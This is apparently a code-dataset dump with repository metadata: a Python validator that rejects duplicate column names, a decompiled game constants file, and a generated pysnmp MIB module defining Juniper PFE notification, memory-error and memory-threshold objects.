def validate_unique_columns(columns: Sequence[str]) -> Sequence[str]:
if len(set(columns)) < len(columns):
raise DuplicateColumnError
else:
return columns
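The set-length trick above works because a set drops duplicates, so a shorter set means at least one repeated column. A self-contained restatement with usage (the exception class here is a stand-in for weaverbird's `DuplicateColumnError`):

```python
from typing import Sequence

class DuplicateColumnError(Exception):
    # Stand-in for weaverbird.exceptions.DuplicateColumnError.
    pass

def validate_unique_columns(columns: Sequence[str]) -> Sequence[str]:
    # A set drops duplicates, so a shorter set means at least one repeat.
    if len(set(columns)) < len(columns):
        raise DuplicateColumnError
    return columns

print(validate_unique_columns(["a", "b"]))  # ['a', 'b']
try:
    validate_unique_columns(["a", "a"])
except DuplicateColumnError:
    print("duplicate detected")
```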
| 24.090909 | 69 | 0.739623 | 29 | 265 | 6.689655 | 0.62069 | 0.113402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184906 | 265 | 10 | 70 | 26.5 | 0.898148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f78cbb9a7867ee0e39d3aab0ab1b6d463d2d9dea | 286 | py | Python | otp/uberdog/SpeedchatRelayGlobals.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 3 | 2021-02-25T06:38:13.000Z | 2022-03-22T07:00:15.000Z | otp/uberdog/SpeedchatRelayGlobals.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | null | null | null | otp/uberdog/SpeedchatRelayGlobals.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 1 | 2021-02-25T06:38:17.000Z | 2021-02-25T06:38:17.000Z | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: otp.uberdog.SpeedchatRelayGlobals
NORMAL = 0
CUSTOM = 1
EMOTE = 2
PIRATES_QUEST = 3
TOONTOWN_QUEST = 4 | 31.777778 | 104 | 0.730769 | 50 | 286 | 4.14 | 0.8 | 0.028986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205761 | 0.15035 | 286 | 9 | 105 | 31.777778 | 0.646091 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f78d4b064232b8624891d6c13de1212ba11f915e | 28,680 | py | Python | pysnmp-with-texts/JUNIPER-PFE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/JUNIPER-PFE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/JUNIPER-PFE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module JUNIPER-PFE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/JUNIPER-PFE-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:00:43 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
jnxPfeMibRoot, = mibBuilder.importSymbols("JUNIPER-SMI", "jnxPfeMibRoot")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
TimeTicks, IpAddress, Integer32, ObjectIdentity, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Counter64, Counter32, NotificationType, Unsigned32, Gauge32, iso, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "IpAddress", "Integer32", "ObjectIdentity", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Counter64", "Counter32", "NotificationType", "Unsigned32", "Gauge32", "iso", "Bits")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
jnxPfeMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1))
jnxPfeMib.setRevisions(('2014-11-14 00:00', '2014-03-12 00:00', '2011-09-09 00:00', '2010-02-07 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    if mibBuilder.loadTexts: jnxPfeMib.setRevisionsDescriptions(('Added jnxPfeMemoryTrapVars and jnxPfeMemoryNotifications.', 'Added new Table jnxPfeNotifyGlParAccSec which counts notifications for the packets parsed/processed by access-security.', 'Added new Table jnxPfeMemoryErrorsTable which gives parity and ecc errors. Added new Trap pfeMemoryErrors', 'Added new notification types.',))
if mibBuilder.loadTexts: jnxPfeMib.setLastUpdated('201109220000Z')
if mibBuilder.loadTexts: jnxPfeMib.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: jnxPfeMib.setContactInfo(' Juniper Technical Assistance Center Juniper Networks, Inc. 1194 N. Mathilda Avenue Sunnyvale, CA 94089 E-mail: support@juniper.net')
if mibBuilder.loadTexts: jnxPfeMib.setDescription('The MIB provides PFE specific data.')
class JnxPfeMemoryTypeEnum(TextualConvention, Integer32):
    description = 'PFE memory type, nh (1), fw (2), encap (3)'
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
    namedValues = NamedValues(("nh", 1), ("fw", 2), ("encap", 3))
jnxPfeNotification = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1))
jnxPfeNotifyGlTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1), )
if mibBuilder.loadTexts: jnxPfeNotifyGlTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlTable.setDescription('This table provides global PFE notification statistics.')
jnxPfeNotifyGlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeNotifyGlSlot"))
if mibBuilder.loadTexts: jnxPfeNotifyGlEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlEntry.setDescription('')
jnxPfeNotifyGlSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647)))
if mibBuilder.loadTexts: jnxPfeNotifyGlSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlSlot.setDescription('The PFE slot number for this set of global PFE notification statistics.')
jnxPfeNotifyGlParsed = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlParsed.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlParsed.setDescription('Count of notifications reported by the routing chip.')
jnxPfeNotifyGlAged = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlAged.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlAged.setDescription('Count of notifications that are dropped due to the fact that the they have been in the system for too long and hence not valid anymore.')
jnxPfeNotifyGlCorrupt = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlCorrupt.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlCorrupt.setDescription('Count of notifications dropped due to the fact that they have an invalid notification result format. This counter is valid for Internet Processor-I and Internet Processor-II only.')
jnxPfeNotifyGlIllegal = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlIllegal.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlIllegal.setDescription('Count of notifications dropped due to the fact that they have an illegal notification type.')
jnxPfeNotifyGlSample = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlSample.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlSample.setDescription('Count of sample notifications reported by the routing chip.')
jnxPfeNotifyGlGiants = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlGiants.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlGiants.setDescription('Count of notifications dropped that are larger than the supported DMA size.')
jnxPfeNotifyGlTtlExceeded = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlTtlExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlTtlExceeded.setDescription('Count of options/TTL-expired notifications that need to be sent to service interfaces as transit packets. This counter is valid for Internet Processor-I and Internet Processor-II only.')
jnxPfeNotifyGlTtlExcErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlTtlExcErrors.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlTtlExcErrors.setDescription('Count of options/TTL-expired packet notifications that could not be sent as transit packets because the output interface could not be determined. This counter is valid for Internet Processor-I and Internet Processor-II only.')
jnxPfeNotifyGlSvcOptAsp = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlSvcOptAsp.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlSvcOptAsp.setDescription('Count of IP options packets that are sent out to a Services PIC.')
jnxPfeNotifyGlSvcOptRe = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlSvcOptRe.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlSvcOptRe.setDescription('Count of IP options packets that are sent out to the Routing Engine.')
jnxPfeNotifyGlPostSvcOptOut = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlPostSvcOptOut.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlPostSvcOptOut.setDescription('Count of notifications that were re-injected by the services PIC after it had processed the associated packets. These notifications now need to be forwarded out to their actual destination. This counter is valid for Internet Processor-I and Internet Processor-II only.')
jnxPfeNotifyGlOptTtlExp = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlOptTtlExp.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlOptTtlExp.setDescription('Count of TTL-expired transit packets.')
jnxPfeNotifyGlDiscSample = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlDiscSample.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlDiscSample.setDescription('Count of sample notifications that are dropped as they refer to discarded packets in PFE.')
jnxPfeNotifyGlRateLimited = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlRateLimited.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlRateLimited.setDescription('Count of notifications ignored because of PFE software throttling.')
jnxPfeNotifyGlPktGetFails = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlPktGetFails.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlPktGetFails.setDescription('Count of notifications where we could not allocate memory for DMA.')
jnxPfeNotifyGlDmaFails = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 17), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlDmaFails.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlDmaFails.setDescription('Count of notifications where the DMA of associated packets failed for miscellaneous reasons. Valid for T-series Internet Processor only.')
jnxPfeNotifyGlDmaTotals = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 18), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlDmaTotals.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlDmaTotals.setDescription('Count of notifications for which the packet DMA completed. Valid for T-series Internet Processor only.')
jnxPfeNotifyGlUnknowns = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 19), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlUnknowns.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlUnknowns.setDescription('Count of notifications that could not be resolved to a known next hop destination. Valid for T-series Internet Processor only.')
jnxPfeNotifyGlParAccSec = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlParAccSec.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlParAccSec.setDescription('Count of notifications for the packets parsed/processed by access-security.')
jnxPfeNotifyTypeTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2), )
if mibBuilder.loadTexts: jnxPfeNotifyTypeTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeTable.setDescription('This provides type-specific PFE notification stats')
jnxPfeNotifyTypeEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeNotifyGlSlot"), (0, "JUNIPER-PFE-MIB", "jnxPfeNotifyTypeId"))
if mibBuilder.loadTexts: jnxPfeNotifyTypeEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeEntry.setDescription('')
jnxPfeNotifyTypeId = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14))).clone(namedValues=NamedValues(("illegal", 1), ("unclassified", 2), ("option", 3), ("nextHop", 4), ("discard", 5), ("sample", 6), ("redirect", 7), ("dontFragment", 8), ("cfdf", 9), ("poison", 10), ("unknown", 11), ("specialMemPkt", 12), ("autoConfig", 13), ("reject", 14))))
if mibBuilder.loadTexts: jnxPfeNotifyTypeId.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeId.setDescription("This identifies the PFE notification type for this row's stats. Below is a description of each notification type: 1. illegal Packets with invalid notification type. 2. unclassified Packets that did not have a key lookup performed on them. 3. option Packets which have L3 options present. 4. nextHop Packets that are destined to the host. 5. discard Used when a discarded packet is sent to the route processor. 6. sample Unused. 7. redirect This is used when a packet is being sent out on the interface it came in on. 8. dontFragment This is used that a packet needs to be fragmented but the DF (don't fragment) bit is set. 9. cfdf When an MTU exceeded indication is triggered by the CF chip and the packet has DF (don't fragment) set. 10. poison Packets that resolved to a poisoned next hop index. 11. unknown Packets of unknown notification type. 12. specialMemPkt Packets with special memory pkt type notification used in diagnostics. 13. autoconfig Packets with autoconfig PFE notification type used for dynamic VLANs. 14. reject Packets of reject PFE notification type.")
jnxPfeNotifyTypeDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeDescr.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeDescr.setDescription('The description of the Pfe Notification type for this entry.')
jnxPfeNotifyTypeParsed = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeParsed.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeParsed.setDescription('Count of successful parsing of notifications.')
jnxPfeNotifyTypeInput = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeInput.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeInput.setDescription("Count of notifications whose associated packets were DMA'ed into route processor memory.")
jnxPfeNotifyTypeFailed = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeFailed.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeFailed.setDescription('Count of failures in parsing the notifications.')
jnxPfeNotifyTypeIgnored = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeIgnored.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeIgnored.setDescription('Count of notifications where the notification type in the message does not match any of the valid types.')
jnxPfeMemoryErrorsTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3), )
if mibBuilder.loadTexts: jnxPfeMemoryErrorsTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryErrorsTable.setDescription('This provides PFE memory errors')
jnxPfeMemoryErrorsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeFpcSlot"), (0, "JUNIPER-PFE-MIB", "jnxPfeSlot"))
if mibBuilder.loadTexts: jnxPfeMemoryErrorsEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryErrorsEntry.setDescription('')
jnxPfeFpcSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647)))
if mibBuilder.loadTexts: jnxPfeFpcSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeFpcSlot.setDescription('The FPC slot number for this set of PFE notification')
jnxPfeSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647)))
if mibBuilder.loadTexts: jnxPfeSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeSlot.setDescription('The pfe slot number for this set of errors')
jnxPfeParityErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeParityErrors.setStatus('current')
if mibBuilder.loadTexts: jnxPfeParityErrors.setDescription('The parity error count')
jnxPfeEccErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeEccErrors.setStatus('current')
if mibBuilder.loadTexts: jnxPfeEccErrors.setDescription('The ECC error count')
pfeMemoryErrorsNotificationPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 0))
pfeMemoryErrors = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 0, 1)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeParityErrors"), ("JUNIPER-PFE-MIB", "jnxPfeEccErrors"))
if mibBuilder.loadTexts: pfeMemoryErrors.setStatus('current')
if mibBuilder.loadTexts: pfeMemoryErrors.setDescription('A pfeMemoryErrors notification is sent when the value of jnxPfeParityErrors or jnxPfeEccErrors increases.')
jnxPfeMemory = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2))
jnxPfeMemoryUkernTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 1), )
if mibBuilder.loadTexts: jnxPfeMemoryUkernTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryUkernTable.setDescription('This table provides global PFE ukern memory statistics for specified slot.')
jnxPfeMemoryUkernEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 1, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeGlSlot"))
if mibBuilder.loadTexts: jnxPfeMemoryUkernEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryUkernEntry.setDescription('Entry represent ukern memory percentage free.')
jnxPfeMemoryUkernFreePercent = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setUnits('percent').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeMemoryUkernFreePercent.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryUkernFreePercent.setDescription('The percent PFE ukern memory free within ukern heap.')
jnxPfeMemoryForwardingTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2), )
if mibBuilder.loadTexts: jnxPfeMemoryForwardingTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryForwardingTable.setDescription('This table provides PFE ASIC memory - NH/JTREE or FW/Filter or Encap memory utilization statistics.')
jnxPfeMemoryForwardingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeGlSlot"), (0, "JUNIPER-PFE-MIB", "jnxPfeMemoryForwardingChipSlot"), (0, "JUNIPER-PFE-MIB", "jnxPfeMemoryType"))
if mibBuilder.loadTexts: jnxPfeMemoryForwardingEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryForwardingEntry.setDescription('Entry represent ASIC memory free percent of a specific type in specified pfe instance')
jnxPfeMemoryForwardingChipSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 3)))
if mibBuilder.loadTexts: jnxPfeMemoryForwardingChipSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryForwardingChipSlot.setDescription('ASIC instance number or pfe complex instance number.')
jnxPfeMemoryType = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2, 1, 2), JnxPfeMemoryTypeEnum())
if mibBuilder.loadTexts: jnxPfeMemoryType.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryType.setDescription('PFE ASIC memory type, nh = 1, fw = 2, encap = 3.')
jnxPfeMemoryForwardingPercentFree = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setUnits('percent').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeMemoryForwardingPercentFree.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryForwardingPercentFree.setDescription('Percentage ASIC memory free for a specific memory type. For Trio based linecards Encap memory is not available. Hence no value is returned.')
jnxPfeMemoryTrapVars = ObjectIdentity((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 3))
if mibBuilder.loadTexts: jnxPfeMemoryTrapVars.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryTrapVars.setDescription('PFE notification object definitions.')
jnxPfeGlSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 3, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxPfeGlSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeGlSlot.setDescription('Global slot number for line card resource monitoring.')
jnxPfeInstanceNumber = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 3, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 3))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxPfeInstanceNumber.setStatus('current')
if mibBuilder.loadTexts: jnxPfeInstanceNumber.setDescription('PFE instance number in pfe complex.')
jnxPfeMemoryThreshold = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 3, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setUnits('percent').setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxPfeMemoryThreshold.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryThreshold.setDescription('Configured high memory utilization threshold.')
jnxPfeMemoryNotificationsPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4))
jnxPfeMemoryNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0))
jnxPfeHeapMemoryThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 1)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeHeapMemoryThresholdExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeHeapMemoryThresholdExceeded.setDescription('Indicates that the Heap Memory utilization has crossed the configured watermark.')
jnxPfeHeapMemoryThresholdAbated = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 2)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeHeapMemoryThresholdAbated.setStatus('current')
if mibBuilder.loadTexts: jnxPfeHeapMemoryThresholdAbated.setDescription('Indicates that the Heap Memory utilization has fallen below the configured watermark.')
jnxPfeNextHopMemoryThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 3)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeNextHopMemoryThresholdExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNextHopMemoryThresholdExceeded.setDescription('Indicates that the Next Hop Memory utilization has crossed the configured watermark.')
